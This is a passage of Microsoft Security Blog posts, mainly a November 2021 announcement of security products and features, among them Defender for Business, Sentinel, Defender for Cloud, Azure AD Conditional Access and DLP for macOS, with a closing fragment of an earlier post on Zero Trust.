For a repository of technical resources to help accelerate the deployment and integration of Zero Trust across all security pillars, visit the Zero Trust Guidance Center.

Use the Zero Trust Assessment tool to evaluate your Zero Trust security posture, maturity, and receive practical recommendations to help reach key milestones.

Read the 2021 Microsoft Digital Defense Report (MDDR) for in-depth findings about Microsoft’s tracking of nation-state threat groups, specific threat actors, attack methods, and more.

To learn more about Zero Trust, visit Microsoft Security’s Zero Trust website.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


1Microsoft Digital Defense Report shares new insights on nation-state attacks, John Lambert, Microsoft. 25 October 2021.

The post Evolving Zero Trust—Lessons learned and emerging trends appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust Tags:

Protect your business with Microsoft Security’s comprehensive protection

November 2nd, 2021 No comments

Securing an organization has never been simple. But over the past year, we’ve seen significant changes in the threat landscape that are having a major impact on organizations of every size in every sector. The frequency and sophistication of cyber events have increased significantly. We see headlines every day now of phishing schemes and ransomware attacks. Organizations and agencies that were once considered “off-limits,” like critical infrastructure or healthcare organizations, are now being targeted by bad actors, adding risk to human life.

And with hybrid work here to stay, the attack surface has expanded as personal devices become an essential part of the corporate network. Many security teams I speak with have been shifting their strategy to increase business resilience and, smartly, many have adopted a Zero Trust approach. I am so inspired by the fearlessness I see in these teams. They work tirelessly and confidently behind the scenes to protect their people and their organization from harm. With these superheroes in mind, I have exciting news to share today about how Microsoft Security provides the most comprehensive approach to security, enabling organizations of every size to be fearless as they grow, create, and innovate.

Protection for everyone

Cyber attackers do not discriminate; small businesses are just as susceptible as large enterprises. But based on our research, almost 60 percent of small and medium businesses said they didn’t feel equipped to maintain cybersecurity hygiene, citing insufficient resources and lack of specialized security skills.1 Today, we’re announcing Microsoft Defender for Business, which will enter public preview later this month and has been specifically built to bring the power of enterprise-grade endpoint security to small and medium businesses with up to 300 employees.

Small and medium businesses will be empowered to elevate their security by moving from traditional antivirus to next-generation protection, endpoint detection and response, and threat and vulnerability management—all while taking advantage of simplified setup and management. Defender for Business will be available both as a standalone solution and as integrated protection included within Microsoft 365 Business Premium. Additionally, Defender for Business also works with Microsoft 365 Lighthouse—so, IT service providers can add this powerful endpoint protection to their multi-customer view of security events. Learn more about Microsoft Defender for Business in today’s blog post.

Microsoft was recently announced as a leader in the Forrester XDR Wave™: Extended Detection and Response (XDR), Q4, 2021.2 We continue to innovate to bring the best of SIEM and XDR together to empower defenders with an integrated toolset and rich security intelligence:

  • Microsoft Sentinel (formerly Azure Sentinel) now offers more than 100 solutions for data collection in a new content hub for easy discovery and deployment. We’re expanding fusion’s capabilities to identify previously unknown threats, integrating with Microsoft Azure Synapse to tap into the power of big data analytics, and introducing a new free trial. Learn more about Microsoft Sentinel.
  • Microsoft Defender for Cloud Apps (formerly Microsoft Cloud App Security) now adds a new application governance capability, generally available today. App governance provides security and policy management to help identify, alert, and protect against risky behavior across data, users, and applications. Additionally, Defender for Cloud Apps has extended its app coverage, now including security for more than 26,000 cloud applications and covering all major cloud app use cases. Learn more in today’s blog post.
  • Microsoft Defender for IoT (formerly Azure Defender for IoT), our agentless solution, is now integrated with Microsoft 365 Defender to bring IoT protection into the same workflow as the rest of your XDR. Additionally, it can now discover and secure enterprise IoT devices, which are ideal targets for attackers since they are often unpatched, misconfigured, and unmonitored. These updates enable Defender for IoT to provide unified protection for both enterprise IoT and operational technology (OT) devices used in critical industries like oil and gas. Learn more here.
  • Azure Active Directory (Azure AD) Identity Protection now includes token theft detection, one-click enablement for risk data extensibility, and a built-in workbook to help detect and remediate identity-based threats. Learn more in today’s blog post.

Secure and trusted collaboration

We’re living through unprecedented growth of digital interactions. In this boundaryless digital ecosystem, trust between parties needs to be established in real-time. Yet trust is a rare commodity on the internet. In this new world where digital ‘handshakes’ are more common than analog, identity is absolutely fundamental.

At Microsoft, we’re building the identity of the future: a connective network that enables people, organizations, apps, digital services, and smart devices to make real-time access decisions based on a secure, privacy-respecting credentials exchange. Our identity platform will be the means of establishing trust—it will be the trust fabric for the boundaryless digital ecosystem of the future.

This trust fabric is what makes experiences like Microsoft Teams Connect already possible today. Our flexible and dynamic identity platform, Azure AD, underpins Microsoft Teams to help ensure that every access request, whether internal or external, is secured. It makes establishing secure collaboration across organizational boundaries possible. Security leaders can easily establish inter-company trust, and all employees across multiple companies can collaborate as one extended team.

As collaboration flows freely across organizational boundaries, it’s more important than ever to keep both your data and people secure and private. We firmly believe you can have both strong security and seamless collaboration that empower people to do their best work. With the Microsoft cloud, you can establish one information protection and governance policy and it will carry through to the documents people share in Microsoft 365, the data that’s managed by Azure Purview, the user controls in Microsoft Defender for Cloud Apps, and even the apps you build with Microsoft Power Platform. Today, we’re making several announcements that expand these capabilities:

  • We’re broadening Azure confidential computing to help organizations meet their data privacy and security needs by protecting data-in-use for added security and multi-party computation. Trusted launch is generally available for all Gen2 virtual machines in Azure, and we’re extending our capabilities by partnering with AMD and Intel to offer confidential virtual machines and containers. Learn more about Azure confidential computing.
  • We’re extending the co-authoring and AutoSave capabilities beyond the web and into the desktop Microsoft 365 apps to further enhance real-time collaboration and productivity. Multiple users can now be co-authors on a Word, Excel, or PowerPoint document simultaneously with auto-save—so, you don’t have to choose between information encryption and team collaboration. Learn more here.
  • Insider Risk Management is adding a healthcare playbook with built-in indicators and a customizable machine learning template in public preview. The new playbook connects into Epic and other electronic medical records solutions to help healthcare companies identify potential insider risks related to patient data misuse. Learn more in today’s blog post.
  • To help organizations maintain a positive work culture and a strong commitment to user privacy, Communication Compliance can now analyze content in attachments sent over Teams in addition to traditional text-based messages. To improve the onboarding experience, we’re also introducing Day Zero Insights, now in public preview, to see potential communication risks in your organization without configuring any policies. Learn more in today’s blog post.
  • Microsoft Information Governance is adding the ability to set a retention or deletion policy for cloud attachments. As users often attach files stored in OneDrive and SharePoint to a Teams message, this policy helps organizations ensure they save the version of the file attachment sent with the message. Learn more in today’s blog post.
  • To help customers embrace a Zero Trust approach,Compliance Manager’s data protection baseline assessment now includes additional controls, making it easy to assess, monitor, and improve compliance with our Zero Trust principles and recommendations. Learn more in today’s blog post.
  • Last month, we announced Privacy Management for Microsoft 365 to help our customers proactively identify and prevent privacy risks, manage subject rights requests at scale, and empower employees to make smart data handling decisions. Today, we’re excited to announce Microsoft Priva with Privacy Management for Microsoft 365 as the first Priva solution. We’re committed to helping you build a privacy-resilient workplace and look forward to sharing future Microsoft Priva capabilities.

Protection everywhere

As part of our comprehensive approach to security, we’re committed to helping you protect your whole environment—across clouds, platforms, and devices. Today we’re extending our native Cloud Security Posture Management and Workload Protection capabilities to Amazon Web Services (AWS) within Microsoft Defender for Cloud, formerly known as Azure Security Center and Azure Defender. Defender for Cloud enables you to secure AWS and Azure environments from a single place with the same, seamless experience and without any dependencies on AWS Security hub.

In addition to out-of-the box recommendations that assess your security posture against industry standards and regulatory compliance, we’ve also extended our workload protection capabilities to Amazon’s Kubernetes service (EKS). These enhanced capabilities give security teams unified visibility across their multi-cloud workloads, enabling them to better prioritize with a holistic view of their security state. Learn more from our announcement blog.

Additionally, Microsoft Defender for Cloud now integrates with Azure Purview in public preview, enabling security teams to discover, classify, track, and secure sensitive information across their cloud workloads.

We also continue to expand our platform support on multiple fronts:

  • We’re extending the types of unmanaged devices Microsoft Defender for IoT can discover and monitor to include enterprise IoT devices, such as conferencing systems, Voice over Internet Protocol (VoIP) phones, printers, cameras, and building automation. Learn more about Microsoft Defender for IoT.
  • We’re expanding the breadth of Microsoft Endpoint Manager to include Linux desktops and enabling organizations to deploy security configurations directly to devices with Microsoft Defender for Endpoint. With these new capabilities, Endpoint Manager unifies endpoint configuration, management, and security across Windows, iOS, Android, macOS, and now Linux platforms.
    • With the ability to manage Linux endpoints, organizations can now use Endpoint Manager to configure conditional access from Azure AD specifically for Linux users. Learn more here.
    • Devices that have Defender for Endpoint and are not managed by Endpoint Manager can now be configured to receive security configurations directly without full device enrollment. This enables a single configuration surface in Endpoint Manager across device platforms, regardless of the management platform in use on the device. Learn more here.
  • We’re making Conditional Access policies in Azure AD more granular, more extensible, and easier to deploy. Learn more in today’s blog post.
    • Azure AD Conditional Access now includes new granular access controls with device and application filters, a new dashboard with a comprehensive view of Conditional Access policy gaps and coverage, and pre-built templates for recommended policies. It can now also be applied to workload identities.
    • Azure AD Continuous Access Evaluation extends Conditional Access into each access session. Instead of applying policy just at the point of entry, it enforces policies in near real-time whenever a new threat is detected.
  • Today, we’re extending the support for Microsoft’s Unified Data Loss Prevention (DLP) offering to include macOS. You can now identify sensitive information used on macOS devices and enforce a DLP policy to prevent it from being inappropriately shared, transferred, or used. Learn more in today’s blog post.
  • Additionally, we’re extending the support for our Insider Risk Management offering to include macOS. Now on macOS devices you can leverage enhanced machine learning models to detect potential insider risk activities, such as the exfiltration of sensitive data, by either printing it, uploading it to a network or cloud location, or copying it to a USB. Learn more here.

Be fearless

Inspired by the fearlessness we see in the communities we serve; we’re committed to helping our customers strengthen their security posture and build resilience. As such, we’re proud to accelerate our security investments, including acquisitions such as CloudKnox3 and RiskIQ.4 And we’ve pledged to invest $20 billion globally in security research and development over the next five years. These investments will help drive continued innovation in the tools defenders need to tip the scales in their advantage.

Cybersecurity is a mission of great importance and true urgency. In today’s environment, it requires a comprehensive approach that includes security, compliance, identity, management, and privacy. At Microsoft, we believe that translates into more than just end-to-end solutions; it’s about constantly innovating to better serve our customers’ needs and the requirements of the landscape we all face. It’s about being best in breed, providing the most actionable intelligence, and delivering an integrated and simplified experience. In short, it’s about empowering people and organizations to do more, securely. Learn more about how you can take advantage of Microsoft Security’s comprehensive protection.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


1Your Security Posture Is Lacking: Time For An Adjustment, a commissioned study conducted by Forrester Consulting on behalf of Microsoft, 2020.

2Microsoft achieves a Leader placement in Forrester Wave for XDR, Rob Lefferts, Microsoft. 18 October 2021.

3Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management, Microsoft Security Team, Microsoft. 21 July 2021.

4Microsoft acquired RiskIQ to strengthen cybersecurity of digital transformation and hybrid work, Eric Doerr, Microsoft. 12 July 2021.

The post Protect your business with Microsoft Security’s comprehensive protection appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags: